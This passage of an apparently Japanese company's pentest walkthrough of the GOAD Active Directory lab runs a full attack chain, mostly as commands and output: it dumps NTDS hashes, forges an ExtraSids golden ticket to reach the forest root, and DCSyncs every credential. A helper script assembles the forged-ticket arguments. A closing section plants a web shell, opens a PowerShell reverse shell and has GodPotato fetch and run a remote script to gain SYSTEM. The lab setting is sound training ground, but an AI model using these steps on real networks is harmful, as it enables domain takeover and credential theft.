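    enrollment_flags=CT_FLAG_PEND_ALL_REQUESTS,
    ekus=frozenset({"1.3.6.1.5.5.7.3.2"}),
    enroll_rights=frozenset({"ESSOS.LOCAL\\Domain Users"}),
)
ADMIN_ONLY_TEMPLATE = Template(  # supplies subject, but only admins can enroll
    name="Admins-Only",
    name_flags=CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT,
    enroll_rights=frozenset({"ESSOS.LOCAL\\Domain Admins"}),
)

if __name__ == "__main__":
    for t in (ESC1_TEMPLATE, HARDENED_TEMPLATE, ADMIN_ONLY_TEMPLATE):
        print(f"{t.name}: {'ESC1' if is_esc1(t) else 'not ESC1'} {esc1_blockers(t)}")
```

Either of the two changes in the hardened sample closes ESC1 on its own; the check reports both so a reviewer can see which control is doing the work.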

Sevenkingdoms walkthrough

Exploit the forest root domain SEVENKINGDOMS from the already compromised child domain NORTH.

The route is a golden ticket forged with the child domain's krbtgt hash that carries the parent's Enterprise Admins SID in its SID History (the ExtraSids attack). Because north.sevenkingdoms.local and sevenkingdoms.local are in the same forest, the parent does not apply SID filtering to the child's tickets by default, so the injected SID is honored.

First, get the NTLM hash of krbtgt for north.sevenkingdoms.local, using the NORTH Administrator hash already in hand:

┌──(kali㉿kali)-[~/goad/winterfell] 
└─$ nxc smb north.sevenkingdoms.local -u Administrator -H aad3b435b51404eeaad3b435b51404ee:dbd13e1c4e338284ac4e9874f7de6ef4 --ntds 
[!] Dumping the ntds can crash the DC on Windows Server 2019. Use the option --user <user> to dump a specific user safely or the module -M ntdsutil [Y/n] Y 
SMB 192.168.56.11 445 WINTERFELL [*] Windows 10 / Server 2019 Build 17763 x64 (name:WINTERFELL) (domain:north.sevenkingdoms.local) (signing:True) (SMBv1:False)                                                                                                                                       
SMB 192.168.56.11 445 WINTERFELL [+] north.sevenkingdoms.local\Administrator:dbd13e1c4e338284ac4e9874f7de6ef4 (Pwn3d!) 
SMB 192.168.56.11 445 WINTERFELL [+] Dumping the NTDS, this could take a while so go grab a redbull... 
SMB 192.168.56.11 445 WINTERFELL Administrator:500:aad3b435b51404eeaad3b435b51404ee:dbd13e1c4e338284ac4e9874f7de6ef4::: 
SMB 192.168.56.11 445 WINTERFELL Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: 
SMB 192.168.56.11 445 WINTERFELL krbtgt:502:aad3b435b51404eeaad3b435b51404ee:9cd8721de5b33c59702a9f64787f1ea3::: 
SMB 192.168.56.11 445 WINTERFELL vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: 
SMB 192.168.56.11 445 WINTERFELL arya.stark:1110:aad3b435b51404eeaad3b435b51404ee:4f622f4cd4284a887228940e2ff4e709::: 
SMB 192.168.56.11 445 WINTERFELL eddard.stark:1111:aad3b435b51404eeaad3b435b51404ee:d977b98c6c9282c5c478be1d97b237b8::: 
SMB 192.168.56.11 445 WINTERFELL catelyn.stark:1112:aad3b435b51404eeaad3b435b51404ee:cba36eccfd9d949c73bc73715364aff5::: 
SMB 192.168.56.11 445 WINTERFELL robb.stark:1113:aad3b435b51404eeaad3b435b51404ee:831486ac7f26860c9e2f51ac91e1a07a::: 
SMB 192.168.56.11 445 WINTERFELL sansa.stark:1114:aad3b435b51404eeaad3b435b51404ee:b777555c2e2e3716e075cc255b26c14d::: 
SMB 192.168.56.11 445 WINTERFELL brandon.stark:1115:aad3b435b51404eeaad3b435b51404ee:84bbaa1c58b7f69d2192560a3f932129::: 
SMB 192.168.56.11 445 WINTERFELL rickon.stark:1116:aad3b435b51404eeaad3b435b51404ee:7978dc8a66d8e480d9a86041f8409560::: 
SMB 192.168.56.11 445 WINTERFELL hodor:1117:aad3b435b51404eeaad3b435b51404ee:337d2667505c203904bd899c6c95525e::: 
SMB 192.168.56.11 445 WINTERFELL jon.snow:1118:aad3b435b51404eeaad3b435b51404ee:b8d76e56e9dac90539aff05e3ccb1755:::
SMB 192.168.56.11 445 WINTERFELL samwell.tarly:1119:aad3b435b51404eeaad3b435b51404ee:f5db9e027ef824d029262068ac826843::: 
SMB 192.168.56.11 445 WINTERFELL jeor.mormont:1120:aad3b435b51404eeaad3b435b51404ee:6dccf1c567c56a40e56691a723a49664::: 
SMB 192.168.56.11 445 WINTERFELL sql_svc:1121:aad3b435b51404eeaad3b435b51404ee:84a5092f53390ea48d660be52b93b804::: 
SMB 192.168.56.11 445 WINTERFELL WINTERFELL$:1001:aad3b435b51404eeaad3b435b51404ee:77681f192335d80e476b29aabe77c9bf::: 
SMB 192.168.56.11 445 WINTERFELL CASTELBLACK$:1105:aad3b435b51404eeaad3b435b51404ee:20425334e9f78d883485696487ab1b67::: 
SMB 192.168.56.11 445 WINTERFELL SEVENKINGDOMS$:1104:aad3b435b51404eeaad3b435b51404ee:f85ab966533246d54fc98f68f6741dd8::: 
SMB 192.168.56.11 445 WINTERFELL [+] Dumped 19 NTDS hashes to /home/kali/.nxc/logs/WINTERFELL_192.168.56.11_2024-10-26_222548.ntds of which 16 were added to the database 
SMB 192.168.56.11 445 WINTERFELL [*] To extract only enabled accounts from the output file, run the following command: 
SMB 192.168.56.11 445 WINTERFELL [*] grep -iv disabled /home/kali/.nxc/logs/WINTERFELL_192.168.56.11_2024-10-26_222548.ntds | cut -d ':' -f1

Got the hash for krbtgt (RID 502): 9cd8721de5b33c59702a9f64787f1ea3.

Next, get the domain SIDs. Two are needed: the child's SID, which becomes the forged ticket's domain SID, and the parent's SID, which becomes the prefix of the extra SID.

First the child domain, NORTH, on 192.168.56.11:

┌──(kali㉿kali)-[~/goad/winterfell] 
└─$ impacket-lookupsid -domain-sids north.sevenkingdoms.local/Administrator@192.168.56.11 -hashes aad3b435b51404eeaad3b435b51404ee:dbd13e1c4e338284ac4e9874f7de6ef4   
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Brute forcing SIDs at 192.168.56.11 
[*] StringBinding ncacn_np:192.168.56.11[\pipe\lsarpc] 
[*] Domain SID is: S-1-5-21-2343606889-1312097775-3500245986 
500: NORTH\Administrator (SidTypeUser) 
501: NORTH\Guest (SidTypeUser) 
502: NORTH\krbtgt (SidTypeUser) 
512: NORTH\Domain Admins (SidTypeGroup) 
513: NORTH\Domain Users (SidTypeGroup) 
514: NORTH\Domain Guests (SidTypeGroup) 
515: NORTH\Domain Computers (SidTypeGroup) 
516: NORTH\Domain Controllers (SidTypeGroup) 
517: NORTH\Cert Publishers (SidTypeAlias) 
520: NORTH\Group Policy Creator Owners (SidTypeGroup) 
521: NORTH\Read-only Domain Controllers (SidTypeGroup) 
522: NORTH\Cloneable Domain Controllers (SidTypeGroup) 
525: NORTH\Protected Users (SidTypeGroup) 
526: NORTH\Key Admins (SidTypeGroup) 
553: NORTH\RAS and IAS Servers (SidTypeAlias) 
571: NORTH\Allowed RODC Password Replication Group (SidTypeAlias) 
572: NORTH\Denied RODC Password Replication Group (SidTypeAlias) 
1000: NORTH\vagrant (SidTypeUser) 
1001: NORTH\WINTERFELL$ (SidTypeUser) 
1102: NORTH\DnsAdmins (SidTypeAlias) 
1103: NORTH\DnsUpdateProxy (SidTypeGroup) 
1104: NORTH\SEVENKINGDOMS$ (SidTypeUser) 
1105: NORTH\CASTELBLACK$ (SidTypeUser) 
1106: NORTH\Stark (SidTypeGroup) 
1107: NORTH\Night Watch (SidTypeGroup) 
1108: NORTH\Mormont (SidTypeGroup) 
1109: NORTH\AcrossTheSea (SidTypeAlias) 
1110: NORTH\arya.stark (SidTypeUser) 
1111: NORTH\eddard.stark (SidTypeUser) 
1112: NORTH\catelyn.stark (SidTypeUser) 
1113: NORTH\robb.stark (SidTypeUser) 
1114: NORTH\sansa.stark (SidTypeUser) 
1115: NORTH\brandon.stark (SidTypeUser) 
1116: NORTH\rickon.stark (SidTypeUser) 
1117: NORTH\hodor (SidTypeUser) 
1118: NORTH\jon.snow (SidTypeUser) 
1119: NORTH\samwell.tarly (SidTypeUser) 
1120: NORTH\jeor.mormont (SidTypeUser) 
1121: NORTH\sql_svc (SidTypeUser)

Next the forest root, SEVENKINGDOMS, on 192.168.56.10, still authenticating with the NORTH Administrator hash (the lookup works across the trust):

┌──(kali㉿kali)-[~/goad/winterfell] 
└─$ impacket-lookupsid -domain-sids north.sevenkingdoms.local/Administrator@192.168.56.10 -hashes aad3b435b51404eeaad3b435b51404ee:dbd13e1c4e338284ac4e9874f7de6ef4 
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Brute forcing SIDs at 192.168.56.10 
[*] StringBinding ncacn_np:192.168.56.10[\pipe\lsarpc] 
[*] Domain SID is: S-1-5-21-2095540843-66383145-2975355457 
498: SEVENKINGDOMS\Enterprise Read-only Domain Controllers (SidTypeGroup) 
500: SEVENKINGDOMS\Administrator (SidTypeUser) 
501: SEVENKINGDOMS\Guest (SidTypeUser) 
502: SEVENKINGDOMS\krbtgt (SidTypeUser) 
512: SEVENKINGDOMS\Domain Admins (SidTypeGroup) 
513: SEVENKINGDOMS\Domain Users (SidTypeGroup) 
514: SEVENKINGDOMS\Domain Guests (SidTypeGroup) 
515: SEVENKINGDOMS\Domain Computers (SidTypeGroup) 
516: SEVENKINGDOMS\Domain Controllers (SidTypeGroup) 
517: SEVENKINGDOMS\Cert Publishers (SidTypeAlias) 
518: SEVENKINGDOMS\Schema Admins (SidTypeGroup) 
519: SEVENKINGDOMS\Enterprise Admins (SidTypeGroup) 
520: SEVENKINGDOMS\Group Policy Creator Owners (SidTypeGroup) 
521: SEVENKINGDOMS\Read-only Domain Controllers (SidTypeGroup) 
522: SEVENKINGDOMS\Cloneable Domain Controllers (SidTypeGroup) 
525: SEVENKINGDOMS\Protected Users (SidTypeGroup) 
526: SEVENKINGDOMS\Key Admins (SidTypeGroup) 
527: SEVENKINGDOMS\Enterprise Key Admins (SidTypeGroup) 
553: SEVENKINGDOMS\RAS and IAS Servers (SidTypeAlias) 
571: SEVENKINGDOMS\Allowed RODC Password Replication Group (SidTypeAlias) 
572: SEVENKINGDOMS\Denied RODC Password Replication Group (SidTypeAlias) 
1000: SEVENKINGDOMS\vagrant (SidTypeUser) 
1001: SEVENKINGDOMS\KINGSLANDING$ (SidTypeUser) 
1102: SEVENKINGDOMS\DnsAdmins (SidTypeAlias) 
1103: SEVENKINGDOMS\DnsUpdateProxy (SidTypeGroup) 
1104: SEVENKINGDOMS\NORTH$ (SidTypeUser) 
1105: SEVENKINGDOMS\ESSOS$ (SidTypeUser) 
1106: SEVENKINGDOMS\Lannister (SidTypeGroup) 
1107: SEVENKINGDOMS\Baratheon (SidTypeGroup) 
1108: SEVENKINGDOMS\Small Council (SidTypeGroup) 
1109: SEVENKINGDOMS\DragonStone (SidTypeGroup) 
1110: SEVENKINGDOMS\KingsGuard (SidTypeGroup) 
1111: SEVENKINGDOMS\DragonRider (SidTypeGroup) 
1112: SEVENKINGDOMS\AcrossTheNarrowSea (SidTypeAlias) 
1113: SEVENKINGDOMS\tywin.lannister (SidTypeUser) 
1114: SEVENKINGDOMS\jaime.lannister (SidTypeUser) 
1115: SEVENKINGDOMS\cersei.lannister (SidTypeUser) 
1116: SEVENKINGDOMS\tyron.lannister (SidTypeUser) 
1117: SEVENKINGDOMS\robert.baratheon (SidTypeUser)
1118: SEVENKINGDOMS\joffrey.baratheon (SidTypeUser) 
1119: SEVENKINGDOMS\renly.baratheon (SidTypeUser) 
1120: SEVENKINGDOMS\stannis.baratheon (SidTypeUser) 
1121: SEVENKINGDOMS\petyer.baelish (SidTypeUser) 
1122: SEVENKINGDOMS\lord.varys (SidTypeUser) 
1123: SEVENKINGDOMS\maester.pycelle (SidTypeUser)

north.sevenkingdoms.local (192.168.56.11): S-1-5-21-2343606889-1312097775-3500245986

sevenkingdoms.local (192.168.56.10): S-1-5-21-2095540843-66383145-2975355457

Note that the NORTH listing has no RID 518 or 519: Schema Admins and Enterprise Admins exist only in the forest root domain. That is why the extra SID has to be built from the parent's SID rather than the child's.

With the child's krbtgt hash and both domain SIDs, forge the golden ticket. The ticket's own domain SID is NORTH's; the -extra-sid value is the parent domain's SID with RID 519 appended, i.e. SEVENKINGDOMS\Enterprise Admins, which the parent's DC reads from the PAC's SID History. The parent's Domain Admins SID (RID 512) would also give the parent domain, but Enterprise Admins is an administrator in every domain of the forest, so 519 is the usual choice. Background on the technique: https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/sid-history-injection#sid-history-injection-attack

┌──(kali㉿kali)-[~/goad/winterfell] 
└─$ impacket-ticketer -nthash 9cd8721de5b33c59702a9f64787f1ea3 -domain-sid S-1-5-21-2343606889-1312097775-3500245986 -domain north.sevenkingdoms.local -extra-sid S-1-5-21-2095540843-66383145-2975355457-519 goldenuser 
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Creating basic skeleton ticket and PAC Infos 
[*] Customizing ticket for north.sevenkingdoms.local/goldenuser 
[*] PAC_LOGON_INFO 
[*] PAC_CLIENT_INFO_TYPE 
[*] EncTicketPart 
[*] EncAsRepPart 
[*] Signing/Encrypting final ticket 
[*] PAC_SERVER_CHECKSUM 
[*] PAC_PRIVSVR_CHECKSUM 
[*] EncTicketPart 
[*] EncASRepPart 
[*] Saving ticket in goldenuser.ccache

(Python DeprecationWarning lines about datetime.utcnow() printed by ticketer.py are omitted above; they are harmless.)

Use the forged ticket to DCSync the forest root. The ticket is issued for north.sevenkingdoms.local/goldenuser, but the target is the parent DC kingslanding.sevenkingdoms.local; it is accepted because the PAC's SID History carries the Enterprise Admins SID:

┌──(kali㉿kali)-[~/goad/winterfell] 
└─$ export KRB5CCNAME=goldenuser.ccache 
                                                                                                                                                            
┌──(kali㉿kali)-[~/goad/winterfell] 
└─$ impacket-secretsdump -k -no-pass -just-dc-ntlm north.sevenkingdoms.local/goldenuser@kingslanding.sevenkingdoms.local 
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash) 
[*] Using the DRSUAPI method to get NTDS.DIT ​​secrets 
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c66d72021a2d4744409969a581a1705e::: 
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: 
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:20c52248354cb5f4cce513c736ce99a5::: 
vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: 
tywin.lannister:1113:aad3b435b51404eeaad3b435b51404ee:af52e9ec3471788111a6308abff2e9b7::: 
jaime.lannister:1114:aad3b435b51404eeaad3b435b51404ee:12e3795b7dedb3bb741f2e2869616080::: 
cersei.lannister:1115:aad3b435b51404eeaad3b435b51404ee:c247f62516b53893c7addcf8c349954b::: 
tyron.lannister:1116:aad3b435b51404eeaad3b435b51404ee:b3b3717f7d51b37fb325f7e7d048e998::: 
robert.baratheon:1117:aad3b435b51404eeaad3b435b51404ee:9029cf007326107eb1c519c84ea60dbe::: 
joffrey.baratheon:1118:aad3b435b51404eeaad3b435b51404ee:3b60abbc25770511334b3829866b08f1::: 
renly.baratheon:1119:aad3b435b51404eeaad3b435b51404ee:1e9ed4fc99088768eed631acfcd49bce::: 
stannis.baratheon:1120:aad3b435b51404eeaad3b435b51404ee:d75b9fdf23c0d9a6549cff9ed6e489cd::: 
petyer.baelish:1121:aad3b435b51404eeaad3b435b51404ee:6c439acfa121a821552568b086c8d210::: 
lord.varys:1122:aad3b435b51404eeaad3b435b51404ee:52ff2a79823d81d6a3f4f8261d7acc59::: 
maester.pycelle:1123:aad3b435b51404eeaad3b435b51404ee:9a2a96fa3ba6564e755e8d455c007952::: 
KINGSLANDING$:1001:aad3b435b51404eeaad3b435b51404ee:f661727e5c8df73a4d6bc2892ff5bda6::: 
NORTH$:1104:aad3b435b51404eeaad3b435b51404ee:35296a99e4d4c1f512b05b4486ff56aa::: 
ESSOS$:1105:aad3b435b51404eeaad3b435b51404ee:86ac8394a5c6af4329886bf9e4d58407::: 
[*] Cleaning up...

The forest root's secrets are now dumped, including the SEVENKINGDOMS Administrator and krbtgt hashes. With the parent's krbtgt hash a golden ticket can be forged directly for sevenkingdoms.local, and Enterprise Admins rights cover every domain in that forest. essos.local is a separate forest, which is why it was taken through ESC1 above rather than through this trust.
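The steps above (read both domain SIDs, build the extra SID, forge the ticket) are mechanical and easy to get wrong by swapping the child and parent. The following is an added example, not impacket code and not part of GOAD: it parses lookupsid-style output, checks that RID 519 appears in the parent listing and not in the child one, builds the extra SID, assembles the ticketer arguments, and models whether an injected SID survives SID filtering. The two output samples are trimmed copies of the listings above; the filtering model is a simplification (intra-forest trusts pass SID History through unless quarantined; a quarantined or external trust keeps only SIDs whose domain part is the trusted domain itself).

```python
"""Plan an ExtraSids golden ticket from lookupsid output (constructed sample data)."""
import re

ENTERPRISE_ADMINS_RID = 519
DOMAIN_SID_RE = re.compile(r"S-1-5-21-\d+-\d+-\d+")
_SID_LINE = re.compile(r"Domain SID is: (S-1-5-21-\d+-\d+-\d+)")
_RID_LINE = re.compile(r"^\s*(\d+): (.+?) \(SidType\w+\)\s*$")

# Trimmed copies of the two impacket-lookupsid listings shown above.
NORTH_OUTPUT = """\
[*] Domain SID is: S-1-5-21-2343606889-1312097775-3500245986
500: NORTH\\Administrator (SidTypeUser)
502: NORTH\\krbtgt (SidTypeUser)
512: NORTH\\Domain Admins (SidTypeGroup)
1104: NORTH\\SEVENKINGDOMS$ (SidTypeUser)
"""
SEVENKINGDOMS_OUTPUT = """\
[*] Domain SID is: S-1-5-21-2095540843-66383145-2975355457
500: SEVENKINGDOMS\\Administrator (SidTypeUser)
512: SEVENKINGDOMS\\Domain Admins (SidTypeGroup)
518: SEVENKINGDOMS\\Schema Admins (SidTypeGroup)
519: SEVENKINGDOMS\\Enterprise Admins (SidTypeGroup)
1104: SEVENKINGDOMS\\NORTH$ (SidTypeUser)
"""


def parse_lookupsid(output: str):
    """Return (domain SID, {rid: name}) from impacket-lookupsid -domain-sids output."""
    domain_sid, rids = None, {}
    for line in output.splitlines():
        m = _SID_LINE.search(line)
        if m:
            domain_sid = m.group(1)
            continue
        m = _RID_LINE.match(line)
        if m:
            rids[int(m.group(1))] = m.group(2)
    if domain_sid is None:
        raise ValueError("no 'Domain SID is:' line in output")
    return domain_sid, rids


def extra_sid(domain_sid: str, rid: int = ENTERPRISE_ADMINS_RID) -> str:
    """Append a RID to a domain SID, e.g. parent SID + 519 = Enterprise Admins."""
    if not DOMAIN_SID_RE.fullmatch(domain_sid):
        raise ValueError(f"not a domain SID: {domain_sid!r}")
    return f"{domain_sid}-{rid}"


def sid_domain(sid: str) -> str:
    return sid.rsplit("-", 1)[0]


def survives_sid_filtering(injected_sid: str, trusted_domain_sid: str, *,
                           intra_forest: bool, quarantined: bool = False) -> bool:
    """Simplified model of whether a SID-History entry is kept across a trust.
    The ticket was forged in the trusted domain (the child here); filtering, when
    active, drops any SID whose domain part is not the trusted domain's own."""
    if intra_forest and not quarantined:
        return True                      # default for child -> parent trusts
    return sid_domain(injected_sid) == trusted_domain_sid


def plan_extrasids(child_lookup: str, parent_lookup: str) -> dict:
    """Sanity-check the two listings and produce the SIDs needed for ticketer."""
    child_sid, child_rids = parse_lookupsid(child_lookup)
    parent_sid, parent_rids = parse_lookupsid(parent_lookup)
    problems = []
    if ENTERPRISE_ADMINS_RID not in parent_rids:
        problems.append("RID 519 not in parent listing: is this really the forest root?")
    if ENTERPRISE_ADMINS_RID in child_rids:
        problems.append("child listing has RID 519: child/parent arguments swapped?")
    return {
        "child_sid": child_sid,
        "parent_sid": parent_sid,
        "extra_sid": extra_sid(parent_sid),
        "target_group": parent_rids.get(ENTERPRISE_ADMINS_RID),
        "problems": problems,
    }


def ticketer_args(krbtgt_nthash: str, child_domain: str, child_sid: str,
                  parent_sid: str, user: str = "goldenuser") -> list:
    """Argument vector matching the impacket-ticketer invocation used above."""
    return ["impacket-ticketer", "-nthash", krbtgt_nthash, "-domain-sid", child_sid,
            "-domain", child_domain, "-extra-sid", extra_sid(parent_sid), user]


if __name__ == "__main__":
    plan = plan_extrasids(NORTH_OUTPUT, SEVENKINGDOMS_OUTPUT)
    print(plan)
    print(" ".join(ticketer_args("9cd8721de5b33c59702a9f64787f1ea3",
                                 "north.sevenkingdoms.local",
                                 plan["child_sid"], plan["parent_sid"])))
```

The swap check relies on the observation above that RID 519 only appears in the forest root's listing; feeding the listings in the wrong order reports both problems instead of silently producing a ticket the parent DC would ignore.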

Conclusion

This completes the walkthrough: administrator privileges and credentials have been obtained on every machine in both forests.

I hope this article has helped you understand pentesting better.

We are currently looking for people who would like to work with us at NFLabs to conduct research and give back to the field, so we look forward to your application.

https://nflabs.jp/recruit/

Well, I hope to have another opportunity to write something for you.


Other things

GodPotato on castelblack

Browse to http://192.168.56.22 and upload cmdasp.aspx through the web upload form, then visit http://192.168.56.22/upload/cmdasp.aspx.

Running whoami /all there shows we are iis apppool\defaultapppool with SeImpersonatePrivilege enabled, which is the privilege the Potato family (GodPotato here) abuses to get SYSTEM.

Create a PowerShell #3 (base64) reverse shell from revshells.com and execute it from cmdasp.aspx:

bolke@hacky:~$ nc -nlvp 4444
Listening on 0.0.0.0 4444
Connection received on 192.168.56.22 49922

PS C:\windows\system32\inetsrv> whoami
iis apppool\defaultapppool
PS C:\windows\system32\inetsrv> 


PS C:\temp> curl http://192.168.56.1:8888/god.exe -o god.exe

PS C:\temp> ./god.exe -cmd "powershell.exe -nop -w hidden -ep bypass -c IEX(New-Object Net.WebClient).DownloadString('http://192.168.56.1:8888/rev.ps1');"

rev.ps1 is a reverse-shell script whose last line is: Invoke-PowerShellTcp -Reverse -IPAddress 192.168.56.1 -Port 4444
bolke@hacky:~/htb$ nc -nlvp 4444
Listening on 0.0.0.0 4444
Connection received on 192.168.56.22 49941
Windows PowerShell running as user CASTELBLACK$ on CASTELBLACK
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\ad\tools>whoami
nt authority\system
PS C:\ad\tools> hostname
castelblack
PS C:\ad\tools> 

.